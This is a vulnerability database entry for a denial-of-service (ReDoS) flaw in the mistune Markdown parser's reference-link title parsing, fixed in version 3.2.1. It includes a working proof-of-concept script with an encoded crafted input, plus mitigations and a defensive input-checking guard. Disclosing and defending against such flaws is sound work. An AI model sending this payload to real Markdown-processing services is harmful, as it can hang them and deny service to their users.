
Vulnerability_id VCID-sh4a-8vh7-ayb4
Summary
Duplicate Advisory: Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input
### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-8mp2-v27r-99xp. This link is maintained to preserve external references.

### Original Description

### Summary
**Denial-of-Service (DoS)** vulnerability in the Mistune Markdown parser. The issue occurs when processing specially crafted reference links, which can cause excessive parsing and CPU consumption, leading to application hangs.

**Function affected:** parse_link_title() in helpers.py
**Issue:** Malformed reference links cause excessive backtracking and parsing loops.
**Impact:** Remote attackers can submit malicious Markdown to hang processes, causing service unavailability.

### Details
```
Name: mistune
Version: 3.2.0
Python version: Python 3.13.9
PIP version: pip 25.2
OS: Kali-linux-VERSION="2025.4"
```

### PoC
```
import mistune
import base64

print("Exploit started....!")
data = base64.b64decode(
    "WX5Efn5+RH5+fkRbIVt6XQoKW3q7XTpdOgoifn5+RFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcflt+RFshW3pdCgpbeg=="
)
mistune.html(data.decode("utf-8", errors="ignore"))
```

### Reproduce steps:
Run the Python script above: the process hangs and CPU utilization rises to 100%.

**Fuzzer Output (libFuzzer):**
```
ERROR: libFuzzer: timeout after 3 seconds
SUMMARY: libFuzzer: timeout
```

**Stack Trace (Excerpt):**
```
mistune/helpers.py:170 in parse_link_title
mistune/block_parser.py:259 in parse_ref_link
mistune/core.py:216 in parse_method
mistune/block_parser.py:458 in parse
mistune/markdown.py:93 in parse
mistune/markdown.py:120 in __call__
```
### Image PoC:
![Screenshot of the PoC run](https://github.com/user-attachments/assets/009e836f-fff7-439e-b0be-6e889bed0077)

### Impact:
- Denial-of-Service (DoS)
- High CPU usage and application hang
- Potential for service unavailability in web apps or APIs processing untrusted Markdown

### Suggested Mitigations:
- Implement parsing depth and iteration limits.
- Limit reference-link title length.
- Detect excessive escape-character sequences.
- Add defensive checks in parse_link_title.
- Add fuzz regression tests using the provided PoC.

This vulnerability was discovered using coverage-guided fuzzing and is reproducible consistently.
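A pre-parse input guard that applies the title-length and escape-run limits suggested above, added here as an example for this page; it is not mistune's code and does not depend on how mistune's LINK_TITLE_RE is written. The numeric limits, the simplified reference-definition pattern and the sample inputs are assumptions; call check_markdown() on untrusted text before passing it to mistune.html().

```python
import re

# Limits are constructed assumptions for this example, not values taken from the
# advisory, from mistune, or from the CommonMark specification. Tune per deployment.
MAX_INPUT_BYTES = 64 * 1024   # refuse oversized documents outright
MAX_TITLE_CHARS = 256         # bound the text a reference-link title may contain
MAX_ESCAPE_RUN = 16           # longest run of consecutive backslashes tolerated

# Start of a link reference definition: up to 3 spaces, "[label]:", a destination.
# Simplified from CommonMark; this is the example's own pattern, not mistune's.
_REF_DEF_START = re.compile(r"^[ ]{0,3}\[(?P<label>[^\]\n]{1,999})\]:[ \t]*\S+", re.M)
_BLANK_LINE = re.compile(r"\n[ \t]*\n")
_ESCAPE_RUN = re.compile(r"\\{%d,}" % (MAX_ESCAPE_RUN + 1))
_TITLE_CLOSER = {'"': '"', "'": "'", "(": ")"}


def reference_title_spans(text):
    """Yield (label, title_text) for each reference definition found in text.

    The title is whatever follows the destination up to its closing quote/paren.
    If it is unterminated, everything up to the next blank line counts as title,
    because that is the stretch a parser may be forced to scan and backtrack over.
    """
    for m in _REF_DEF_START.finditer(text):
        blank = _BLANK_LINE.search(text, m.end())
        tail = text[m.end(): blank.start() if blank else len(text)].lstrip()
        closer = _TITLE_CLOSER.get(tail[:1])
        if not closer:
            yield m.group("label"), ""      # no title at all, nothing to bound
            continue
        end = tail.find(closer, 1)          # heuristic: ignores escaped closers
        yield m.group("label"), tail if end == -1 else tail[: end + 1]


def check_markdown(text):
    """Return None when text is within limits, else a short rejection reason."""
    if len(text.encode("utf-8")) > MAX_INPUT_BYTES:
        return "input exceeds %d bytes" % MAX_INPUT_BYTES
    run = _ESCAPE_RUN.search(text)
    if run:
        return "run of %d backslashes at offset %d" % (len(run.group()), run.start())
    for label, title in reference_title_spans(text):
        if len(title) > MAX_TITLE_CHARS:
            return "title of reference [%s] exceeds %d chars" % (label, MAX_TITLE_CHARS)
    return None
```

A non-None result should be logged with the reason and the request rejected before any rendering starts; a hard per-request CPU or wall-clock budget remains the backstop for inputs the heuristics miss.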
Aliases
  - GHSA-hjph-f4mc-wx4c
Fixed_packages
  - purl: pkg:pypi/mistune@3.2.1
    is_vulnerable: false
    affected_by_vulnerabilities: (none)
    resource_url: http://public2.vulnerablecode.io/packages/pkg:pypi/mistune@3.2.1
Affected_packages
  - purl: pkg:pypi/mistune@3.0.0a1
    is_vulnerable: true
    affected_by_vulnerabilities: VCID-dtjf-n7mt-z3ba, VCID-q9br-dckr-gkd1, VCID-sh4a-8vh7-ayb4
    resource_url: http://public2.vulnerablecode.io/packages/pkg:pypi/mistune@3.0.0a1
  - purl: pkg:pypi/mistune@3.2.0
    is_vulnerable: true
    affected_by_vulnerabilities: VCID-8tt4-rc9y-9qgc, VCID-atg4-cdz2-cfhe, VCID-dtjf-n7mt-z3ba, VCID-j8pk-v8t3-ybbu, VCID-jpzc-rd9c-vufu, VCID-q9br-dckr-gkd1, VCID-sh4a-8vh7-ayb4
    resource_url: http://public2.vulnerablecode.io/packages/pkg:pypi/mistune@3.2.0
References
  - reference_url: https://github.com/lepture/mistune
    scores:
      - 7.7 (cvssv4; CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P)
      - HIGH (generic_textual)
  - reference_url: https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c
    scores:
      - HIGH (cvssv3.1_qr)
      - 7.7 (cvssv4; CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P)
      - HIGH (generic_textual)
  - reference_url: https://github.com/advisories/GHSA-hjph-f4mc-wx4c
    reference_id: GHSA-hjph-f4mc-wx4c
    scores:
      - HIGH (cvssv3.1_qr)
Weaknesses
  - CWE-400 Uncontrolled Resource Consumption: The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.
Exploits: (none)
Severity_range_score: 7.0 - 8.9
Exploitability: null
Weighted_severity: null
Risk_score: null
Resource_url: http://public2.vulnerablecode.io/vulnerabilities/VCID-sh4a-8vh7-ayb4